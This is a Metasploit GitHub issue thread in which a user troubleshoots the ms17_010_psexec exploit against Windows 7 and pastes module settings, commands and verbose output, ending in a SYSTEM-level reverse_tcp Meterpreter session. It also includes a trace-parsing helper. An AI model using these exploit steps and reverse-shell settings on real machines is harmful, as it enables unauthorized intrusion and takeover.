Metasploit-framework: The server responded with error: STATUS_ACCOUNT_RESTRICTION ms17_010_psexec

Created on 26 Mar 2018 · 22 comments · Source: rapid7/metasploit-framework

Why am I just there and the user is showing me this?
I understood that it was possible without a password..
How can I even read an article on how to use the script?

All 22 comments

What named pipes did the exploit find?

Actually, paste all your output.

```
Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   DBGTRACE              true             yes       Show extra debug trace info
   LEAKATTEMPTS          99               yes       How many times to try to leak transaction
   NAMEDPIPE                              no        A named pipe that can be connected to (leave blank for auto)
   RHOST                 10.0.0.28        yes       The target address
   RPORT                 445              yes       The Target port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser               berkhim          no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.14        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28
rhost => 10.0.0.28
msf exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.0.0.14:4444 
[-] 10.0.0.28:445 - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCOUNT_RESTRICTION (Command=115 WordCount=0)
[*] Exploit completed, but no session was created.
```

I use Kali..
and I did not set SMBPass;
I set SMBUser,
and the Windows victim is Windows 7.

Is setting SMBUser causing the problem? Is that why it's giving STATUS_ACCOUNT_RESTRICTION?
Also, does the exploit work without setting SMBUser?

STATUS_ACCOUNT_RESTRICTION - Local Security Policy/Accounts: Limit local account use of blank passwords to computer.

> Also does the exploit work without setting SMBUser ?

On Windows XP I tried without setting a username and password and it succeeded,
but on Windows 7 it did not work for me, and I saw in another video that it did work.
Link: https://www.youtube.com/watch?v=Wx8mLdPL-s0&t=17s
That's why it's confusing.

What error does it give when you try it without setting SMBUser?

```
msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28
rhost => 10.0.0.28
msf exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.0.0.15:4444
[*] 10.0.0.28:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.0.0.28:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.
```

Have you checked if the target is vulnerable to ms17_010?

Detecting an accessible named pipe is, I think, the entry point; if the exploit doesn't find one, then I'm afraid it won't work at all..

Yes.
Yes, it's my little brothers' computer and I'm learning with it,
so I opened port 445 from the beginning.

```
msf > clear
[*] exec: clear

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.0.0.28
rhosts => 10.0.0.28
msf auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.0.0.28:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_ms17_010) >
```

set VERBOSE true and try again, @elibr1212.

```
msf exploit(windows/smb/ms17_010_psexec) > set rhost 10.0.0.28 
rhost => 10.0.0.28
msf exploit(windows/smb/ms17_010_psexec) > set dbgtrace 1 
dbgtrace => true
msf exploit(windows/smb/ms17_010_psexec) > set verbose 1 
verbose => true
msf exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.0.0.15:4444 
[*] 10.0.0.28:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.0.0.28:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: browser - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: atsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: DAV RPC SERVICE - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: epmapper - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: eventlog - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: InitShutdown - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: keysvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: lsass - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: LSM_API_service - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: ntsvcs - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: plugplay - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: protected_storage - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: router - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: SapiServerPipeS-1-5-5-0-70123 - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: scerpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: srvsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: tapsrv - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: trkwks - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: W32TIME_ALT - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: wkssvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: db2remotecmd - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/ms17_010_psexec) > 
```

> What named pipes did the exploit find?

So, going back to the original question, it looks like you have no accessible named pipes. You either need creds, anonymous access, or to find a different pipe you have access to.
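Added example, not from this thread or from the module itself: a small Python triage helper that reads the VERBOSE/DBGTRACE output in the format pasted above and states, per host, why ms17_010_psexec stopped (no pipe reachable for a null session, or a blank-password login rejected) or which pipe it could use. The sample lines are constructed, and the status explanations are the defender's reading of the two NT statuses seen in this thread, not text from the module.

```python
import re
from collections import defaultdict

# Constructed sample in the format msfconsole prints for ms17_010_psexec with VERBOSE/DBGTRACE set; abridged.
SAMPLE_OUTPUT = """\
[*] 10.0.0.28:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.0.0.28:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Inaccessible named pipe: DAV RPC SERVICE - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.28:445 - Unable to find accessible named pipe!
[*] 10.0.0.21:445 - Connected to named pipe: epmapper
[-] 10.0.0.29:445 - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCOUNT_RESTRICTION (Command=115 WordCount=0)
"""

PIPE_DENIED = re.compile(r"^\[-\] (?P<host>\S+) - Inaccessible named pipe: (?P<pipe>.+?) - .*error: (?P<status>STATUS_\w+)")
PIPE_OK = re.compile(r"^\[\*\] (?P<host>\S+) - Connected to named pipe: (?P<pipe>\S+)")
LOGIN_FAIL = re.compile(r"^\[-\] (?P<host>\S+) - .*Login Failed: .*error: (?P<status>STATUS_\w+)")

# Meaning of the two statuses seen in this thread (assumed wording, defender's view).
EXPLANATIONS = {
    "STATUS_ACCESS_DENIED": "null session may not open this pipe, so there is nothing to exploit through",
    "STATUS_ACCOUNT_RESTRICTION": "local account with a blank password refused over the network "
                                  "(Limit local account use of blank passwords / LimitBlankPasswordUse)",
}

def parse_trace(text):
    """Group trace lines per host: accessible pipes, denied pipes with their status, login status."""
    hosts = defaultdict(lambda: {"accessible": [], "denied": {}, "login": None})
    for line in text.splitlines():
        if m := PIPE_OK.match(line):
            hosts[m["host"]]["accessible"].append(m["pipe"])
        elif m := PIPE_DENIED.match(line):
            hosts[m["host"]]["denied"][m["pipe"]] = m["status"]
        elif m := LOGIN_FAIL.match(line):
            hosts[m["host"]]["login"] = m["status"]
    return dict(hosts)

def diagnose(info):
    """One-line verdict: what stopped the module on this host, or which pipe let it proceed."""
    if info["login"]:
        return f"login failed with {info['login']}: {EXPLANATIONS.get(info['login'], 'see NT status reference')}"
    if info["accessible"]:
        return "accessible pipe(s): " + ", ".join(info["accessible"])
    statuses = sorted(set(info["denied"].values()))
    return (f"no accessible pipe among {len(info['denied'])} tried; "
            + "; ".join(f"{s}: {EXPLANATIONS.get(s, '?')}" for s in statuses))

def triage(text):
    return {host: diagnose(info) for host, info in parse_trace(text).items()}  # host -> verdict

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_OUTPUT).items():
        print(host, "->", verdict)
```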

> You either need creds, anonymous access

How do I do that?

@wvu-r7 do we need to add named pipes like COMNAP, COMNODE described in above article to the list?

> "If you control the box you're testing"

Yes, now I checked the computer
and I see that the sharing service is not working,
and when I try to run it in "services"
it does not let me turn on the render..
And I'll look at what you sent.
Well done for the work you do! It's not taken for granted.
You are champions.

Probably not if they're for IBM mainframes. :P

I opened a virtual machine (Windows 7 x86) now lol
And it worked

```
[*] Started reverse TCP handler on 10.0.0.15:4444
[*] 10.0.0.21:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.0.0.21:445 - Inaccessible named pipe: netlogon - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: lsarpc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: samr - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: browser - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: atsvc - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[-] 10.0.0.21:445 - Inaccessible named pipe: DAV RPC SERVICE - The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
[*] 10.0.0.21:445 - Connected to named pipe: epmapper
[*] 10.0.0.21:445 - Frag pool info leak: arch=x86, size=0x8
[*] 10.0.0.21:445 - GROOM_POOL_SIZE: 0x5020
[*] 10.0.0.21:445 - BRIDE_TRANS_SIZE: 0xfc8
[*] 10.0.0.21:445 - Attempting leak #0
[*] 10.0.0.21:445 - CONNECTION: 0x872c5010
[*] 10.0.0.21:445 - SESSION: 0x9e286058
[*] 10.0.0.21:445 - FLINK: 0x97353028
[*] 10.0.0.21:445 - InParam: 0x9e2c20dc
[*] 10.0.0.21:445 - MID: 0xb03
[-] 10.0.0.21:445 - Unexpected Flink alignment, delta: -6f6ffd8
[*] 10.0.0.21:445 - Align transaction and leak failed, attempt #0
[*] 10.0.0.21:445 - Attempting leak #1
[*] 10.0.0.21:445 - CONNECTION: 0x872c5010
[*] 10.0.0.21:445 - SESSION: 0x9e286058
[*] 10.0.0.21:445 - FLINK: 0x9e2d4050
[*] 10.0.0.21:445 - InParam: 0x9e2ce0dc
[*] 10.0.0.21:445 - MID: 0xb03
[*] 10.0.0.21:445 - Leaked connection struct (0x872c5010), performing WriteAndX type confusion
[*] 10.0.0.21:445 - Control of groom transaction
[*] 10.0.0.21:445 - Built a write-what-where primitive...
[*] 10.0.0.21:445 - Overwrote IsNullSession = 0, IsAdmin = 1 at 0x9e2860ee
[*] 10.0.0.21:445 - Session Data: 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
[*] 10.0.0.21:445 - session dat len = 256
[*] 10.0.0.21:445 - Session ctx offset = 80
[*] 10.0.0.21:445 - Session ctx data = d837289e041102000108000000000000010000000000000100000000000000000d0000000000000000000000000000002e0030003000300037003b003b003b00530059002900280041003b003b0030007800660030003000300037003b003b003b00420041002900280041003b003b003000780032003b003b003b0053004f00
[*] 10.0.0.21:445 - secCtxAddr: 9e2837d8
[*] 10.0.0.21:445 - Reading secCtxData from 9e2837d8
[*] 10.0.0.21:445 - Read data from secCtx: 2a021c000300000003000000180db093000000000000000000000000
[*] 10.0.0.21:445 - Overwrote token SID security context with fake context
[+] 10.0.0.21:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.0.0.21:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 10.0.0.21:445 - PowerShell found
[*] 10.0.0.21:445 - Selecting PowerShell target
[*] 10.0.0.21:445 - Powershell command length: 2404
[*] 10.0.0.21:445 - Executing the payload...
[*] 10.0.0.21:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.0.0.21[\svcctl] ...
[*] 10.0.0.21:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.0.0.21[\svcctl] ...
[*] 10.0.0.21:445 - Obtaining a service manager handle...
[*] 10.0.0.21:445 - Creating the service...
[+] 10.0.0.21:445 - Successfully created the service
[*] 10.0.0.21:445 - Starting the service...
[+] 10.0.0.21:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.0.0.21:445 - Removing the service...
[+] 10.0.0.21:445 - Successfully removed the service
[*] 10.0.0.21:445 - Closing service handle...
[*] Sending stage (179779 bytes) to 10.0.0.21
[+] 10.0.0.21:445 - SYSTEM session cleaned up.
[*] Meterpreter session 2 opened (10.0.0.15:4444 -> 10.0.0.21:49170) at 2018-03-27 23:04:42 +0300

meterpreter > sysinfo
Computer : WIN-IUAS33RLC03
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : he_IL
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
```

Did you read the module doc? `info -d` may have been helpful.

I did it through anonymity as you said..
And yes, thanks.
